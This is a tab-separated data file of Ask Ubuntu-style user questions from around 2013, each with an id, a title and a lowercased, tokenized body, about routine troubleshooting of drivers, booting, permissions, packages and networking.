299936	access to apache subdomains externally	i just recently configured a localhost subdomain on my apache web server . domain : hjm.im subdomain : blog.hjm.im it is working correctly from on my server ( which makes sense ) , but how can i get access to it from the outside . if you type blog.hjm.im into your browser nothing gets returned . do i need to create a dns record ? or is there some setting inside of apache that does this for me ?
299939	ubuntu 13.04 window title font	how can i change the font for the window title in 13.04 ubuntu ? original text : wie kann ich die schrift f체r den fenstertitel bei ubuntu 13.04 채ndern ?
299941	ubuntu 13.04 installation with liveusb	i made a bootable usb using universal usb installer , mounting the .iso file on it and disabling the secure boot with uefi mode on . now whenever i go to the bios menu , the option to boot from my usb drive shows up , but clicking on it does nothing and windows 8 is booted . what do i do ?
299943	setting permissions - best practices ?	i have read through the permissions tutorial on ubuntu.com and still have a few questions . i really dont understand the `` group '' part of the permission , what group , and how do i change the group as well as see what groups there are and what users have access to them . is it bad practice to change the ownership of a secondary hdd to my user acccount instead of root . is it bad to just set permissions for a drive to 777 ? i tried this and noticed terminal started highlighting it green in -ls in general what are best practices for keeping computer secure but also allowing me to have permissions navigate and modify everything .
299950	how do i install pygame in virtualenv ?	in installed python-virtualenv , because this question said i should use virtualenv to install pygame . however , i 'm not really sure how that 's accomplished . what i did ( following these instructions ) : virtualenv -- no-site-packages -- distribute -p /usr/bin/python3.3 ~/.virtualenvs/pywork3 -- no-pip and then i do n't know where to go . how do i install pygame to be used in the virtualenv ? edit : i followed guysoft 's instructions , and everything installed great . however , when i tried import pygame in python3 , i got the following error : > > > import pygame traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /home/alden/.virtualenvs/pywork3/lib/python3.3/site-packages/pygame/__init__.py '' , line 95 , in < module > from pygame.base import * importerror : /home/alden/.virtualenvs/pywork3/lib/python3.3/site-packages/pygame/base.cpython-33m.so : undefined symbol : pycobject_check
299956	want to see username besides power button	today i installed a fresh ubuntu 13.04 raring but when i logged in i saw the text that represents my username at the top-right corner of screen has gone ! but i want to see it again like 12.10 and 12.04
299957	is there a way to make software updater use apt-fast as a backend ?	i 've been using apt-fast in the command line for some time now and have enjoyed how it speeds upgrades by downloading packages in parallel . it would be great if software updater could also gain the update/upgrade download speed boost from apt-fast . software updater seems merely to be a gui for the command sudo apt-get update & & sudo apt-get dist-upgrade , is there a way to switch out apt-get for apt-fast ?
299961	how can i install eldy on ubuntu 12.04 ?	i have a question for you . i found this software eldy and it says it works on linux . however , i am unsure how to install it on ubuntu . this page ( from the eldy folks ) appears to say how to install it , but i 'm confused . it requires you to download a deb file , but it explains some terminal commands needed . also , here it says a newer version is available . how exactly should i install eldy and where should i download it from ? i really appreciate all your help . have a good day !
299964	why is ufw logging 'block ' messages regarding a port for which ufw is configured to 'allow ' connections ?	here 's an example log message : may 25 10:36:07 myserver kernel : [ 7057243.392334 ] [ ufw block ] in=eth0 out= mac=00:02:55:67:82 : eb:00:06 : b1:3a : ef:62:08:00 src=69.197.128.26 dst=192.168.100.101 len=44 tos=0x00 prec=0x00 ttl=32 id=0 proto=tcp spt=48788 dpt=80 window=972 res=0x00 rst urgp=0 my understanding is that dpt stands for `` destination port '' , but since i have ufw configured to allow incoming connections on port 80 , i 'm puzzled as to why i 'd be seeing such a log message -- a log message which seems to be indicating ufw blocked a connection attempt on that port . the following are the relevant lines from ufw status : to action from -- -- -- -- -- -- 80/tcp allow anywhere 80/tcp allow anywhere ( v6 ) i 've now seen this on both ubuntu 11.10 , and now ( after upgrading the same machine ) on ubuntu 12.04 .
299966	how do i get my laptop not to lock up every time i close the lid in ubuntu 13.04	every time i close my laptop lid , ubuntu 13.04 will lock up . i have it set in the power settings to do nothing for when i close the lid on both battery power and when plugged in , yet when i do close the lid , the system seems to lock up . note , the mouse will move as normal , and it looks like nothing is wrong . but when i try to click or press any buttons , the system is unresponsive . i have to power cycle the laptop and re-boot in order to continue using it . any help would be appreciated ! regards , john
299969	installing ubuntu on an external hard disk	i found this question and it is very similar to my situation . i am satisfied with zkriesse 's answer but i want to know whether data in my external hard disk would be lost using this method . and what about fernhill linux project 's method ? also , i downloaded the universal usb installer and thought of directly installing ubuntu to drive j : ( which is my external hard disk ) but for that , i had to check `` now showing all drives ( be careful ) '' . would anything go wrong if i go ahead ? why does it say , `` be careful '' . would anything go wrong if i install ubuntu into drive j : directly without checking the `` format j : \ drive ( erases content ) '' checkbox ? i repeat that i can not afford to lose a single byte of my data in the external hard disk .
299975	proper way to change terminal resolution in ubuntu server 13.04 ?	i 'm running ubuntu server 13.04 in a vmware vm running only in command-line mode ( i.e . no gui ) . it defaults to a 640x480 screen resolution , but i 'd like to increase that to either 800x600 or 1024x768 . lines in /etc/default/grub that i 've changed include : grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' consoleblank=0 '' grub_gfxmode=800x600 i 've tried many of the suggestions i 've seen online , variants of the above three lines , and many have simply hung the reboot with a blank screen , forcing a force-shutdown of the vm ... at which point i backed up one vmware snapshot . running 'sudo hwinfo -- framebuffer ' gives me a lot of info : model : `` vmware virtual machine '' revision : `` 2.0 '' memory size : 64 mb lines for 800x600 include : mode 0x0303 : 800x600 ( +800 ) , 8 bits mode 0x0314 : 800x600 ( +1600 ) , 16 bits mode 0x0324 : 800x600 ( +800 ) , 8 bits mode 0x0332 : 800x600 ( +1600 ) , 16 bits mode 0x0340 : 800x600 ( +3200 ) , 24 bits i 've excluded all the other resolutions as i 'm just interested in 800x600 at the moment . apparently ubuntu server 13.04 using grub2 , so how do i accomplish this ?
299976	installing software not in ubuntu software center	i find installing software from the software center straightforward and easy . however , i find it very confusing ( actually impossible to install other software ) . could you generate ( for absolute novices ) a narrated youtube video demonstrating how to do this ? specifically , the lazarus / pascal programming ide in the software center is not the most current one and has a lot of bugs . in windows i loaded the current version and it works beautifully . also , could you add lazarus ver . 1.0.8 with fpc 2.6.2 to the software center while i am getting up to speed installing software without the ubuntu center .
299978	ubuntu 1304 mount nas synology	i do have a question concerning mount of nas via a network from outside . unfortunately i have no clue how i can mount a nas from a extern network . i did a vpn setup between 2 routers , so far i was able to get it work , but now i 'm in doubt how i can handle the mount to my nas from outside via internet . i hope somebody do have a hint for me ? regards alf
299982	can i install 12.04 from 11.10 ?	i 'm having trouble with the download for 12.04 . can i download 11.10 and install 12.04 from it ? will it be supported ?
299985	how to bind a key such that it toggles between one particular application and the current application ?	i want to bind a key such that a particular application ( in my case pidgin or calculator ) gets the focus , then when i am done and press key again , the focus returns to the previously focused application , as though i never changed focus . for example : before : chromium —alt+tab→ files —alt+tab→ chromium use of key binding : chromium — ( bound key ) → pidgin ( answer to chat ) or calc ( calculate something ) — ( bound key ) → chromium after using above : chromium —alt+tab→ files ( not pidgin ) —alt+tab→ chromium other alternatives are welcome .
299993	how to modify an input in bash script ?	i want to do the following on a bash script : i want the user to enter a file name and the bash script must move the file to another file as follows . if the user enters input.tex , i want to move this file to another file named inputmerged.tex . i have the following bash script named myscript.sh : # ! /bin/bash mv $ 1 $ 2 the above however needs to be run as ./myscript input.tex inputmerged.tex the second input is redundant , since the new file , which i move to , is of the same type and always has the word merged appended at the end of the first filename . how should i do it to get rid of the second input in the bash script ? thanks
299995	win tv hvr-1100 ubuntu 12.04	i am new to ubuntu but really like it . everything works except my hauppage hvr-1100 tv tuner card . well i get a composite video input picture with tvtime but no sound , and kaffeine wo n't tune in any channels . any help would be appreciated , thanks mike .
299996	generating a single latex file by merging different latex files	i have a main latex file which inputs many other latex files i.e . for example \documentclass { article } \begin { document } \input { input1.tex } \input { ./input_folder_1/input2.tex } \input { input3.tex } \input { ./input_folder_2/input_folder_3/input4.tex } \end { document } let 's call the above file say main.tex . i want a single latex file , which imports contents from input1.tex , input2.tex , input3.tex and input4.tex , so that i have only one single latex file instead of the above four latex files . how do i go about writing a bash-script which does this job for me ? ps : i need to submit an article a journal and i thought it would be good to have a single .tex file . the issue is the following . i have different files in sub-directories in a recursive manner and hence i can not upload these individual files since the directory structure in the input command is on the local folder on my computer . i could of-course put these manually but i thought if there would be a way out similar to the .bbl file for the bibliography .
299997	psp emulator that works with 13.04 ?	do you guys know any psp emulator ( like ppsspp or jpcsp in windows ) which can be run on 13.04 ? if it 's not automaticaly configured , please give me step by step configuration to get it works .
300000	fix shutdown on hp 530 ( kernel 3.9.2 / ubuntu 13.04 )	i needed to upgrade to kernel 3.9.3 to get ubuntu fully working on my hp 530 ; black screen after update to 13.04 ( hp 530 ) - solution available however , the laptop does n't shutdown anymore or hangs when it is going in standby . i did some research and i found this kernel patch which wil solve the problem : https : //bugzilla.kernel.org/show_bug.cgi ? id=58401 # c6 however , i do n't know how to apply the patch ? just copy-paste the text in the terminal gives errors . can somebody help me ?
300002	how do i download non ubuntu software ?	i am new to the ubuntu desktop and i have no clue as to download non software center software , i.e.adobe , anti- virus programs , etc ...
300004	why does chown have no effect ? ( 13.04 )	i am using chown because folders/files i download via firefox are being saved as being owned by root instead of my own user ... when i used : sudo chown -r -v username : username path/path/path i see logs that show that the relevant files/folders have been changed to be owned by the giver username - yet when i view the files in a file manager they remain 'owned ' by root.. does anyone know why this is ?
300005	newbie questions about ubuntu cloud , maas and storage	i 'd like to take openstack for a test drive with some spare gear so i 've been trying to find and read documentation on it but i 'm awash in package names and feel like i 'm trying to drink from a firehose . : - ) what i 'm shooting for is setting up a private cloud that 's got some redundancy where i can lose any single node without losing the vms running on the cloud . as i understand it , there 's some storage mechanism openstack uses called swift that accomplishes this ? does maas use swift by default ? is each maas node providing storage for the cloud as a whole ? the ubuntu cloud docs i read say the minimum number of maas nodes is 6 . but other openstack docs seem to imply that one can run with fewer nodes . what is the minimum number of maas nodes do i need to have at least minimal redundancy ? and what do i need to do besides installing maas nodes , a cluster controller and a region controller and juju ? are there extra steps on top of that to have various levels of ha ? all i 'm shooting for at this point is storage redundancy and having vms ( at worst ) reboot if the node they had been running on died ...
300006	limited resolution with intel graphics	my dell laptop has an intel graphics hd 3000 driving a 1600x900 lcd . however , for some reason , ubuntu 13.04 and 14.04 wo n't let me set the resolution above 1024x768 . can anyone offer any advice ? thanks ! $ lshw < snip > *-display unclaimed description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller cap_list configuration : latency=0 resources : memory : f1400000-f17fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 # lspci -vvnnk < snip > 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device [ 1028:04c4 ] control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin a routed to irq 16 region 0 : memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable- count=1/1 maskable- 64bit- address : 00000000 data : 0000 capabilities : [ d0 ] power management version 2 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ a4 ] pci advanced features afcap : tp+ flr+ afctrl : flr- afstatus : tp- < snip > 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 525m ] [ 10de:0df5 ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f
300009	how to set left-handed mouse pointer ?	is there a way to set a left-handed mouse pointer in ubuntu 13.04 ? for those who do n't know what left-handed mouse pointers are :
300015	upgrade from 12.10 to 13.04 - unity not loading	i recently upgraded my ubuntu dist to 13.04 ( from 12.10 ) , after the upgrade when i log in my desktop is n't loading unity . i can access my terminal ( through ctrl+alt+t ) and most apps through it , i tried reseting compiz with no success , and even tried reinstalling my graphics card driver ( amd ati catalyst radeon hd 4800 ) , but it ca n't install because it says it 's missing a module ( /lib/modules/3.8.0-22-generic/build/include/linux/version.h ) anyone can give me a hand to recover my desktop ? thanks in advance
300016	can i use ubuntu one on the raspberry pi ?	i am an ubuntu one user on multiple platforms and want to know if there is a way i can use ubuntu one with my raspberry pi ?
300017	how to install amd radeon graphics driver in hp pavilion g6-1037tx ?	hy , i am new user and very much keen on using ubuntu . right now i am using ubuntu 12.10 . just i need to know how can i install amd hd radeon graphics driver in my hp pavilion g6-1037tx . my laptop fan operates all the time and it gets heated . hoping for reply as soon as possible . regards , manish rajbhandari
300021	gnome 3 desktop icons appears on startup not after second login	i 'm currently running gnome 3.6.3.1 on ubuntu 13.04 and i would like to remove my desktop icons . oddly enough , they only appear the very first time i boot up the machine ; if i logout and then log back in , they 're gone . i 've gone into dconf-editor and made sure /org/gnome/nautilus/desktop and made sure that all the *-icon-visible boxes are unchecked . if i go to /org/gnome/background and uncheck show-desktop-icons , then the icons persist through login , logout cycles . any help would be appreciated !
300027	unknown encoder 'libx264 ' .i am using x264 and fdk-aac with avconv from libav	i did the following : make a directory avconv-source mkdir avconv-source download and install the x264 library cd ~/avconv-source git clone git : //git.videolan.org/x264.git x264 cd x264 sudo ./configure -- enable-static sudo make sudo make install download the avconv source cd ~/avconv-source git clone git : //git.libav.org/libav.git avconv cd avconv sudo ./configure sudo ./configure -- enable-gpl -- enable-libx264 sudo make sudo make install
300031	ca n't connect the second bluetooth headset ( ubuntu 13.04 64 )	i upgraded from 12.04 and lost the ability to connect multiple bluetooth headsets to watch movies with my wife and not disturb the neighbours ! any headsets that connects the first will remain the only headsets that can use the audio sink . any idea how to fix this ?
300036	useradd from php script	is it possible to add an user with php script ?
300037	could unity 2d speed up 3d games on ubuntu 13.04 ?	i know that ubuntu 12.04 allows for specifying unity 2d or 3d at login . using unity 2d when playing 3d games is supposed to make things work faster . does this also apply to ubuntu 13.04 ? if so , how can i get the unity 2d desktop on my raring ringtail ? i am using an amd 6670 graphics card with 1gb ram and catalyst 13.4 proprietary driver . i am running ubuntu 13.04 64-bit .
300049	is there a maximum number of groups ?	we started an ubuntuserver for versioncontrol and would like to access our repositories via ssh . as we need to give access to several external developers i thought it would be the best way to create a group per project and add the users to it which should use the repository . i can not say how many projects will be created in the future , so i wonder if we could run into problems later . is there a maximum number of existing groups or groups of which a user can be member of in ubuntu 12.04 ?
300060	skype no video in 13.04	recently i upgraded from 12.10 to 13.04 , after struggling a lot , i finally managed to install and run skype , but no matter what i do , there is no video at all . i have tried every solution from this site with no results yet . does anybody know how to fix this issue ?
300065	why openoffice is not available in ubuntu software center	i was wondering , why is it that openoffice is not available in ubuntu.even if ubuntu choose libreoffice over openoffice , that does not mean that openoffice should be removed or not available as an option . is n't having options is one of the great things about linux . beside having problems coexisting with libreoffice , a warning or a statement should be issued when installing openoffice from the software center , such as 'you ca n't install openoffice and libreoffice at the same time , please remove libreoffice ' .
300077	can i revert a usb flash drive to it 's previous state ?	i downloaded a usb disk image ( .iso file ) of 12.04 precise and followed these instructions to create a mac osx bootable disk ( .dmg file ) . the flash drive is enormous ( ~64 gb ) , and contained many other things , which i fear have been erased . in the mac file browser ( `` finder '' ) , the usb drive does n't even show up , as if there is no filesystem mounted . can somebody confirm that this process wipes the drive clean before creating the disk image ? is the previous filesystem permanently gone ?
300079	ubuntu , after starting up , goes black	i used the wubi to install ubuntu beside windows a while ago and decided that it was time to take the step and upgrade . after i did , and everything went fine , when the computer started up it went to the purple start screen as normal then black ... ... ... ... .for ever ... ... . i am afraid to download 13.04 and install it in case i want to upgrade to 13.10 when it comes out for the fear of the ... black screen ... . what would cause this ? its literally right after the upgrade and right after the start up purple screen . this upgrade is only a distro upgrade , doing regular updates is fine .
300080	have ubuntu want kubuntu	earlier today i was messing around with ubuntu and found a package that gave me a graphic box with different version in it like ubuntu xubuntu kubuntu and so on . i found it very useful as you could install one and remove the other at the same time , but the main problem is now i ca n't seem to find it again and i 've searched google but ca n't find a post about it either which sucks . does anyone know what this package is call and the terminal code to get it to run .
300086	installation issues with ubuntu 13.4 on lenovo r60	i am trying to install ubuntu 13.04 on a lenovo r60 with 4 gb of ram and 15 gb hdd using bootable cd . initially after the reboot , i see a small icon in the bottom of the screen and hear sound from my cd drive . after that i see black screen with a prompt and nothing happens . my r60 has windows xp installed on it currently . how do i debug this issue with the installation ? jags
300090	updating problem `` ubuntu11.04 ''	i am very beginner in ubuntu . i have installed ubuntu 11.04 . but a problems occured when i am trying to do update through update manager . first shows the massage : after closing this , the following box appears : i have downloaded some packages clicking on install updates and when i am clicking on close option ( incompletting all the packages downloaded ) , the following dialog box appears : when i click on partial upgrade the following box appears : now my question : is this *start upgrade * option means system upgrade like ubuntu 11.10 ? i do not want system upgrade to ubuntu11.10 . how do i solve this problems . can i update system through terminal ?
300094	my computer boots to a black screen	i know there are a lot of threads for this , but i ca n't seem to find a satisfying answer for my specific situation . i have an acer-aspire 5738z-4619 with the following specifications : http : //paste.ubuntu.com/5702025/ here it is in html format . this is my boot summary : http : //paste.ubuntu.com/5702010/ so , my problem was that i could see nothing after the post ( which apppeared only briefly , as it always has ) . i would then just get a black screen , with nothing on it . i tried walking away for a few minutes , after several times of restarting my machine , and all i got was a blinking cursor . no keyboard response ( i could n't write anything or enter the grub ) . so i figured i should clear cmos . i did so , and nothing happened . i should mention that , before this , i tried several times to boot from an installation cd ( windows xp and then ubuntu 12.04 ) . nothing worked . oddly enough , i got the message `` press any key to boot from the cd '' when i put the xp one ; i pressed `` enter '' and only got a blank screen again . then i did this : removed the disk , changed the boot priority order on the bios and set it to boot first from the cd drive , and ubuntu booted normally , obviously from the hdd . i should note two things : ubuntu has been my only operating system since two years ago ; i am a little curious , so i try some things on my computer and i have this weird mania of reinstalling the so periodically , deleting all my previous data ( i make backups of what 's important ) . recently , i tried dadabuntu ( from the 120 days of ubuntu project ) , which apparently is a software that erases all of the data stored in a computer , leaving it `` blank '' again . i wanted to see how it worked ; it apparently did fine ... then i installed ubuntu 12.04 again , from a cd , and it did just fine . then , on a rush to go out of my home , i accidentaly turned my computer on , and before it could boot properly i shut it down manually . since then , the problem started . i am not experiencing any issues right now , but i would like to know if it 's a serious problem and if there 's something i can do . thanks in advance for your help ; i 'm sorry if i have missed some information and/or given some useless data . thanks for your time reviewing my question . i see it has been marked as duplicate , but none of the answers on the existing posts suits me well ... i was not trying to install ubuntu , nor had a dual boot system , nor downloaded an update that caused the problem . plus , as i said , booting from the installation cd did n't do anything to solve it . perhaps it is merely a hardware issue ; i 'm not very experienced with computers . i posted a new question because i do n't know how to comment on the post you pointed ( and , as i see it , if i want to post i can only post an answer ; i do n't have it ) .
300096	ubuntu 12.04 desktop freezes randomly	every once in a while , without any warning or discernible pattern , my whole ubuntu machine freezes ; the system clock in the upper-right corner stops ticking/moving , all open applications are frozen and can not be interacted with , the mouse can not be moved , etc . the only fix thus far has been to restart . the only common pattern that i think is a solid suspect is the fact that i believe that mozilla firefox ( v. 20 ) is open and running almost every time this happens , if not every time . it happens if i leave my machine running over night ( and ff is also running ) , and sometimes it happens while i 'm actively using ff ( clicking a link , doing some dom operation , whatever ) . i 'd like to attack/solve this problem from both the os- and application-perspective . i 'd like to know what logs ( for both ubuntu and ff ) i could start looking in for warnings , errors or failures . also interested in what the community 's input/feedback is and if there are any other suggestions for debugging . thanks in advance !
300097	how do i create tar.7z file from the command line ?	i would like to zip up my homework from last year . how do i tar and zip the whole folder from command line ubuntu ( i do n't have gui ) .
300102	network is recognized , but unable to connect with 13.04	so , i have a linksys wireless g [ wusb54g ver . 4 ] card that ubuntu recognizes , even finds the ralink rt2500 driver for , and it sees all the networks in range but when i try and connect , it attempts for quite a while and then just quits . i was able to use this card problem free plug and play on ... 11.10 or 12.04 ( i cant remember which ) and really loved using ubuntu , when i upgraded this problem started occuring and i ended up just swapping back to windows7 out of pure frustration . i 'd very much like to switch back now . i dont think it 's a driver issue because ubuntu does recognize the device . i suppose it could be an issue with my router ? i dunno . also , the wireless is totally open , no security or encryption on the router . so i dont think its an issue with that . i dont have any way of getting an ethernet cable to my computer ( router is on the other side of the house ) but i can usb tether my computer if need be . ifconfig results : alex @ jarvis : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:01:6c:18:24:85 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:97 errors:0 dropped:0 overruns:0 frame:0 tx packets:97 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8946 ( 8.9 kb ) tx bytes:8946 ( 8.9 kb ) wlan0 link encap : ethernet hwaddr 00:12:17 : a3 : a4 : cd inet6 addr : fe80 : :212:17ff : fea3 : a4cd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:26 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:42 ( 42.0 b ) tx bytes:6109 ( 6.1 kb )
300103	extending ubuntu partition size with the unallocated space ( swap is between these two )	my ubuntu 12.04 is set up on virtualbox , the host system is windows 7 . when setting up my system , i created 8gb vdi hard drive . in a short time i run out of free space , so i increased the size of the vdi to ~50gb via windows . now i 'm trying to increase the size of my ubuntu partition with the unallocated space gained by increasing the size of the virtual hdd . therefore , i 've booted ubuntu with the livecd and started up gparted . the problem is that i can not increase the size of the desired partition , probably because swap is just between it and the unallocated space . my question is - how can i move my allocated space to the neighborhood of ubuntu partition and then enlarge it ? here is how it looks like in gparted : i 'm also pasting the output of fdisk -l : disk /dev/sda : 53.7 gb , 53687091200 bytes 255 heads , 63 sectors/track , 6527 cylinders , total 104857600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c35eb device boot start end blocks id system /dev/sda1 * 2048 12582911 6290432 83 linux /dev/sda2 12584958 16775167 2095105 5 extended /dev/sda5 12584960 16775167 2095104 82 linux swap / solaris
300104	ca n't watch youtube videos with chromium on ubuntu 13.04 64-bit	i 've digged all over google but i ca n't find any solution to my problem . firefox works pretty well . i have this issue only with chromium and only with youtube . i have no problem watching videos at any other site with chromium . when i try to watch a video a black screen occurs and after a while it gives me the warning `` an error occurred '' . weirdly , sometimes when i try a couple of refreshing it starts to play but then the issue occurs again . i tried removing-reinstalling chromium or the flash plugin but it did not do any good .
300108	how to connect to wireless wifi with 13.04 ?	just installed ubuntu 13.04 64bit , trying to connect to a wireless wifi receiver i have in my house . not showing up in networks ? help please ?
300109	delete files within my download folder	i may have too many dang random files in my download folder because every time i try to get into it my explorer crashes after loading for a bit and i have to reboot my whole pc . i just wondered if there was a way to clear what was in the folder without having to delete the whole folder itself . the main reason i do n't want to delete the whole folder is because i do n't know if that would cause some sort of error in ubuntu so i figured i 'd see if i could clear it first . also i used clamtk to check for viruses in that folder and found none .
300110	13.04 nouveau driver displaying artefacts	upgraded from 12.10 to 13.04 ( amd 64bit ) . have nvidia 8600gt video card . tried to upgrade to nvidia proprietary drivers but in each case system would display a black screen after login and would eventually crash ( reboot ) . followed instructions here to roll back to nouveau driver . can now login but after a hour or so of use artefacts would start showing up on the display - dash would show bits of other windows , icons scrambled . this gets gradually worse until the system is unusable , parts of display are displayed upside down . have to reboot to clear , then have a few more hours of use before i have to reboot again . checked logs but no errors related to video . at this point i 'm wondering what my options are , is a reinstall likely to clear issue ? anybody had a similar issue and been able to fix it ?
300111	opening program in unity dash opens about : blank tab in browser ?	i 'm not sure what 's causing it , but it 's a right pain in the neck . every time i open a program from the dash , it does n't matter what it is it opens a new tab in the browser . this shows the about : blank page . what 's causing this and how can i stop it ?
300114	decimal point from number pad wo n't work on the calculator but will everywhere else	when i 'm using the calculator under accessories on the linux system , i have a number pad to the side of my keyboard i use most frequently and the decimal point will not work from the number pad on the calculator unless i use the regular `` period '' key from the keyboard . all other functions will work ( add , subtract , multiply , divide ) and the decimal point works in excel , word , etc . but not for the calculator . i know someone wanted to change the decimal to a comma , but is there any way to make the decimal work ?
300117	vim cursor color change only applied upon movement	in my .vimrc i have the following ( based upon a tip on the vim wikia ) : if & term =~ `` xterm\\|rxvt '' `` use an red cursor in insert mode let & t_si = `` \ < esc > ] 12 ; red\x7 '' `` use an orange-ish cursor otherwise let & t_ei = `` \ < esc > ] 12 ; \ # ffa560\x7 '' silent ! echo -ne `` \033 ] 12 ; \ # ffa560\007 '' `` reset cursor when vim exits autocmd vimleave * silent ! echo -ne `` \033 ] 112\007 '' endif it is supposed to change the cursor from orange to red when i enter insert mode and change it back when i leave . however this only works if the way i enter insert mode moves the cursor , e.g . 'i ' or 'a ' but not 'i ' . additionally , if i enter and leave insert mode without having done anything ( or moved the cursor ) , hitting 'escape ' will move the cursor back one space , which turns the cursor red , instead of keeping it as orange . is there a way to fix this ? i 'm using xfce4-terminal .
300123	i just installed ubuntu 12.10 from a dvd	i just installed ubuntu 12.10 from a dvd . ( 64-bit ) . i restarted after installation with the dvd in the drive but it went back to the installation menu and started reinstalling . i aborted it and started again . i removed the dvd before installing but now it is hung . any help is appreciated philip
300125	stream to apple tv ?	i would like to be able to do av streaming and ( or ) mirroring with my apple tv from ubuntu . i 'm running 13.04 . is this possible , or will i have to do the outrageously inconvenient task of using an $ 20 hdmi cable ( < /sarcasm > ) ?
300126	what is special about the hicolor icon theme ?	as far as i can recall , whenever i install software using apt-get , i see processing triggers for hicolor-icon-theme ... ( sixth line from top ) appear in my terminal window when the installtion is just about complete . an example is below : selecting previously unselected package chromium-browser . unpacking chromium-browser ( from ... /chromium-browser_25.0.1364.160-0ubuntu3_i386.deb ) ... selecting previously unselected package chromium-browser-l10n . unpacking chromium-browser-l10n ( from ... /chromium-browser-l10n_25.0.1364.160-0ubuntu3_all.deb ) ... processing triggers for man-db ... processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... setting up chromium-codecs-ffmpeg ( 25.0.1364.160-0ubuntu3 ) ... setting up chromium-browser ( 25.0.1364.160-0ubuntu3 ) ... setting up chromium-browser-l10n ( 25.0.1364.160-0ubuntu3 ) ... [ 08:00 am ] ~ $ hence my question . is it because the hicolor icon theme is the `` ultimate '' fallback in case a theme of the user 's choice is lacking some icons ? in other words , is it because it is an essential `` inherit '' and complete in all respects ? ( i know that chromium-browser is currently a possible security risk because it is quite outdated but i want it just for local use as a web app with svg-editor.html . )
300127	how do i make youtube videos stream faster on my ubuntu ?	according to this article , http : //thetechblock.com/how-to-stop-isps-slow-youtube/ , i can make youtube videos stream faster on linux , but i am not entirely sure how to carry out similar commands on the ubuntu terminal . if anyone could enlighten me on iptables commands , please do so and thank you .
300129	content delivery network	i have a project that i need to setup content delivery network on ubuntu , that involves like geo dns structure , fail over and high availability so i am looking if some one help me that where should i start , i have no experience about it , so i would like if some help me with good links or how to configure it ( step by step )
300130	unable to mount filesystem : not authorized	i have two extra hard-drive . but i ca n't access to them . i got error msg : unable to mount filesystem : not authorized any advice ? thank you in advance !
300134	can i remove the .xsession file and similar files from my machine ?	are the following files needed on my machine ? ( i want to remove them . ) .xsession .xsession-errors .xsession-errors.old .xathority.xxxxxx i believe most if not all of them originated during my attempt at getting remote desktop working as i entered the following into the command line : cd /home/youruser echo “gnome-session –session=ubuntu-2d” > .xsession sudo /etc/init.d/xrdp restart
300139	ia32-libs broken package ( ubuntu 12.04 x64 )	i have the latest android sdk installed on ubuntu 12.04 x64 i am having almost an identical problem as problems with eclipse and android sdk . the eclipse adt plugin is not working for me , and its android window shows sdk/build-tools/17.0.0/aapt : error while loading shared libraries : libz.so.1 : can not open shared object file : no such file or directory when i create a new android project . then i tried sudo apt-get install ia32-libs but the commands fails and returns reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . up until now , i followed this answer which worked for the 32-bit adb , and this may have affected how ubuntu is handling ia-32-libs . what must be done to correctly install the necessary libraries to get all the 32-bit android tools to run correctly ? update i tried this answer but it did n't work . i tried sudo apt-get purge libc6 : i386 libncurses5 : i386 libstdc++6 : i386 but ia32-libs still did't install . output of ldd ./aapt linux-gate.so.1 = > ( 0xf778f000 ) librt.so.1 = > /lib32/librt.so.1 ( 0xf7768000 ) libdl.so.2 = > /lib32/libdl.so.2 ( 0xf7760000 ) libpthread.so.0 = > /lib32/libpthread.so.0 ( 0xf7740000 ) libz.so.1 = > not found libstdc++.so.6 = > /usr/lib32/libstdc++.so.6 ( 0xf7658000 ) libm.so.6 = > /lib32/libm.so.6 ( 0xf7628000 ) libgcc_s.so.1 = > /usr/lib32/libgcc_s.so.1 ( 0xf7608000 ) libc.so.6 = > /lib32/libc.so.6 ( 0xf7460000 ) /lib/ld-linux.so.2 ( 0xf7790000 ) libz.so.1 is not found , and ubuntu says that zlib1g is already most current . here 's what worked sudo apt-get install libgl1-mesa-dri : i386 sudo apt-get install ia32-libs-multiarch : i386 sudo apt-get install ia32-libs-multiarch sudo apt-get install ia32-libs
